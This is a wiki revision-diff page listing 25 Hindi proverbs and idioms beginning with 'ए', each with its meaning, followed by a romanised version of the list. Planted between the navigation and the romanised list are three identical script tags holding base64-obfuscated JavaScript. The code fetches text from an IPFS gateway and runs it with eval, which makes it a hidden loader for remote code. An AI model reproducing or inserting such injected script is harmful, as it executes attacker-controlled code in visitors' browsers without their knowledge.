Difference between revisions of "कहावत लोकोक्ति मुहावरे-ए"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "class="wikitable"" to "class="bharattable"")
m (Text replacement - "{{कहावत लोकोक्ति मुहावरे}}" to "{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}")
 
(9 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{कहावत लोकोक्ति मुहावरे}}
+
{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}
  
{| class="bharattable"
+
{| class="bharattable-pink"
 
|-
 
|-
!कहावत लोकोक्ति मुहावरे
+
! style="width:30%"| कहावत लोकोक्ति मुहावरे
!अर्थ
+
! style="width:70%"| अर्थ
 
|-
 
|-
| style="width:30%"|
+
| 1-एक पंथ दो काज
1-एक पंथ दो काज
+
| अर्थ - एक काम के प्रयत्न से दो काम पूरे होना।
| style="width:70%"|
 
अर्थ - एक काम के प्रयत्न से दो काम पूरे होना।
 
 
|-
 
|-
 
|2- एक करेला/गिलोय, दूसरे नीम चढ़ा।
 
|2- एक करेला/गिलोय, दूसरे नीम चढ़ा।
|
+
|अर्थ - एक दोष होने के साथ ही साथ दूसरा दोष भी होना।
अर्थ - एक दोष होने के साथ ही साथ दूसरा दोष भी होना।
 
 
|-
 
|-
 
|3- एक अंडा वह भी गंदा।
 
|3- एक अंडा वह भी गंदा।
|
+
|अर्थ - चीज़ भी थोड़ी है और जितनी है वह भी बेकार है।
अर्थ - चीज़ भी थोड़ी है और जितनी है वह भी बेकार है।
 
 
|-
 
|-
 
|4- एक आँख से रोवे, एक आँख से हँसे।
 
|4- एक आँख से रोवे, एक आँख से हँसे।
|
+
|अर्थ - दिखावटी रोना या दिखावटी काम करना।
अर्थ - दिखावटी रोना या दिखावटी काम करना।
 
 
|-
 
|-
 
|5- एक अनार सौ बीमार।
 
|5- एक अनार सौ बीमार।
|
+
|अर्थ - चीज़ का कम होना और चाहने वाले ज़्यादा होना।
अर्थ - चीज़ का कम होना और चाहने वाले ज़्यादा होना।
 
 
|-
 
|-
 
|6- एक आवे (आवाँ) के बर्तन।
 
|6- एक आवे (आवाँ) के बर्तन।
|
+
|अर्थ - सब का एक जैसा होना जैसे कुम्हार के आवे (आवाँ) में सभी बर्तन एक जैसे ही पकते हैं।  
अर्थ - सब का एक जैसा होना जैसे कुम्हार के आवे (आवाँ) में सभी बर्तन एक जैसे ही पकते हैं।  
 
 
|-
 
|-
 
|7- एक और एक ग्यारह होते हैं।
 
|7- एक और एक ग्यारह होते हैं।
|
+
|अर्थ - एकता में बल होता है।  
अर्थ - एकता में बल होता है।  
 
 
|-
 
|-
 
|8- एक के दूने से सौ के सवाये भले।
 
|8- एक के दूने से सौ के सवाये भले।
|
+
|अर्थ - अधिक लाभ पर कम माल बेचने की अपेक्षा कम लाभ पर अधिक माल बेचना अधिक फ़ायदेमंद होता है।
अर्थ - अधिक लाभ पर कम माल बेचने की अपेक्षा कम लाभ पर अधिक माल बेचना अधिक फायदेमंद होता है।
 
 
|-
 
|-
 
|9- एक गंदी मछली सारे तालाब को गंदा कर देती है।
 
|9- एक गंदी मछली सारे तालाब को गंदा कर देती है।
|
+
|अर्थ - एक बुरा आदमी सारी बिरादरी की बदनामी कराता है।
अर्थ - एक बुरा आदमी सारी बिरादरी की बदनामी कराता है।
 
 
|-
 
|-
 
|10- एक टकसाल के ढले।
 
|10- एक टकसाल के ढले।
|
+
|अर्थ - सबका एक जैसा होना।
अर्थ - सबका एक जैसा होना।
 
 
|-
 
|-
 
|11- एक तवे की रोटी, क्या छोटी क्या मोटी।
 
|11- एक तवे की रोटी, क्या छोटी क्या मोटी।
|
+
|अर्थ - कोई भी भेदभाव नहीं होना अर्थात् समानता का होना।
अर्थ - कोई भी भेदभाव नहीं होना अर्थात समानता का होना।
 
 
|-
 
|-
 
|12- एक तो चोरी दूसरे सीना-जोरी।
 
|12- एक तो चोरी दूसरे सीना-जोरी।
|
+
|अर्थ - कोई अपराध करके अपराध न मानना और उल्टे रौब गाँठना।
अर्थ - कोई अपराध करके अपराध न मानना और उल्टे रौब गाँठना।
 
 
|-
 
|-
 
|13- एक (ही) थैली के चट्टे-बट्टे होना।
 
|13- एक (ही) थैली के चट्टे-बट्टे होना।
|
+
|अर्थ - एक ही जैसे दुर्गुण वाले होना।
अर्थ - एक ही जैसे दुर्गुण वाले होना।
 
 
|-
 
|-
 
|14- एक मुँह दो बातें।
 
|14- एक मुँह दो बातें।
|
+
|अर्थ - अपनी बात से पलट जाना।
अर्थ - अपनी बात से पलट जाना।
 
 
|-
 
|-
 
|15- एक म्यान में दो तलवारें नहीं समा सकती।
 
|15- एक म्यान में दो तलवारें नहीं समा सकती।
|
+
|अर्थ - समान अधिकार वाले दो व्यक्ति एक ही क्षेत्र में नहीं रह सकते हैं।
अर्थ - समान अधिकार वाले दो व्यक्ति एक ही क्षेत्र में नहीं रह सकते हैं।
 
 
|-
 
|-
 
|16- एक हाथ से ताली नहीं बजती।
 
|16- एक हाथ से ताली नहीं बजती।
|
+
|अर्थ - झगड़े के लिए दोनों पक्ष ज़िम्मेदार होते हैं, एक के झगड़ा करने से झगड़ा नहीं होता है।
अर्थ - झगड़े के लिए दोनों पक्ष जिम्मेदार होते हैं, एक के झगड़ा करने से झगड़ा नहीं होता है।
 
 
|-
 
|-
 
|17- एक ही लकड़ी से सबको हाँकना।
 
|17- एक ही लकड़ी से सबको हाँकना।
|
+
|अर्थ - छोटे- बड़े का ध्यान न रखकर सबके साथ एक जैसा ही व्यवहार करना।
अर्थ - छोटे- बड़े का ध्यान न रखकर सबके साथ एक जैसा ही व्यवहार करना।
 
 
|-
 
|-
 
|18- एकै साधे सब सधे, सब साधे सब जाय।
 
|18- एकै साधे सब सधे, सब साधे सब जाय।
|
+
|अर्थ - एक समय में एक ही काम हाथ में लेना चाहिए, कई काम एक साथ करने से कोई काम सही नहीं होता है।
अर्थ - एक समय में एक ही काम हाथ में लेना चाहिए, कई काम एक साथ करने से कोई काम सही नहीं होता है।
 
 
|-
 
|-
 
|19- एक आँख से देखना।
 
|19- एक आँख से देखना।
|
+
|अर्थ - सबको बराबर समझना।
अर्थ - सबको बराबर समझना।
 
 
|-
 
|-
 
|20- एक-एक नस पहचानना।
 
|20- एक-एक नस पहचानना।
|
+
|अर्थ - सब कुछ समझना।
अर्थ - सब कुछ समझना।
 
 
|-
 
|-
 
|21- एक घाट का पानी पीना।
 
|21- एक घाट का पानी पीना।
|
+
|अर्थ - एकता और सहनशील होना।
अर्थ - एकता और सहनशील होना।
 
 
|-
 
|-
 
|22- एक लकड़ी से सबको हाँकना।
 
|22- एक लकड़ी से सबको हाँकना।
|
+
|अर्थ - यथायोग्य व्यवहार न करना।
अर्थ - यथायोग्य व्यवहार न करना।
 
 
|-
 
|-
 
|23- एक ही थैली के चट्टे-बट्टे।
 
|23- एक ही थैली के चट्टे-बट्टे।
|
+
|अर्थ - एक जैसे चरित्र और विचार के लोग।
अर्थ - एक जैसे चरित्र और विचार के लोग।
 
 
|-
 
|-
 
|24- एडि़याँ रगड़ना।
 
|24- एडि़याँ रगड़ना।
|
+
|अर्थ - बहुत दौड़-धूप करना।
अर्थ - बहुत दौड़-धूप करना।
 
 
|-
 
|-
 
|25- एड़ी-चोटी का पसीना एक करना।
 
|25- एड़ी-चोटी का पसीना एक करना।
|
+
| अर्थ - घोर परिश्रम करना।
अर्थ - घोर परिश्रम करना।
 
|-
 
 
|}
 
|}
  

Latest revision as of 12:14, 20 April 2018

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kahavat lokokti muhavare arth
1-ek panth do kaj arth - ek kam ke prayatn se do kam poore hona.
2- ek karela/giloy, doosare nim chadha. arth - ek dosh hone ke sath hi sath doosara dosh bhi hona.
3- ek aanda vah bhi ganda. arth - chiz bhi tho di hai aur jitani hai vah bhi bekar hai.
4- ek aankh se rove, ek aankh se hanse. arth - dikhavati rona ya dikhavati kam karana.
5- ek anar sau bimar. arth - chiz ka kam hona aur chahane vale zyada hona.
6- ek ave (avaan) ke bartan. arth - sab ka ek jaisa hona jaise kumhar ke ave (avaan) mean sabhi bartan ek jaise hi pakate haian.
7- ek aur ek gyarah hote haian. arth - ekata mean bal hota hai.
8- ek ke doone se sau ke savaye bhale. arth - adhik labh par kam mal bechane ki apeksha kam labh par adhik mal bechana adhik fayademand hota hai.
9- ek gandi machhali sare talab ko ganda kar deti hai. arth - ek bura adami sari biradari ki badanami karata hai.
10- ek takasal ke dhale. arth - sabaka ek jaisa hona.
11- ek tave ki roti, kya chhoti kya moti. arth - koee bhi bhedabhav nahian hona arthath samanata ka hona.
12- ek to chori doosare sina-jori. arth - koee aparadh karake aparadh n manana aur ulte raub gaanthana.
13- ek (hi) thaili ke chatte-batte hona. arth - ek hi jaise durgun vale hona.
14- ek muanh do batean. arth - apani bat se palat jana.
15- ek myan mean do talavarean nahian sama sakati. arth - saman adhikar vale do vyakti ek hi kshetr mean nahian rah sakate haian.
16- ek hath se tali nahian bajati. arth - jhag de ke lie donoan paksh zimmedar hote haian, ek ke jhag da karane se jhag da nahian hota hai.
17- ek hi lak di se sabako haankana. arth - chhote- b de ka dhyan n rakhakar sabake sath ek jaisa hi vyavahar karana.
18- ekai sadhe sab sadhe, sab sadhe sab jay. arth - ek samay mean ek hi kam hath mean lena chahie, kee kam ek sath karane se koee kam sahi nahian hota hai.
19- ek aankh se dekhana. arth - sabako barabar samajhana.
20- ek-ek nas pahachanana. arth - sab kuchh samajhana.
21- ek ghat ka pani pina. arth - ekata aur sahanashil hona.
22- ek lak di se sabako haankana. arth - yathayogy vyavahar n karana.
23- ek hi thaili ke chatte-batte. arth - ek jaise charitr aur vichar ke log.
24- edi़yaan rag dana. arth - bahut dau d-dhoop karana.
25- e di-choti ka pasina ek karana. arth - ghor parishram karana.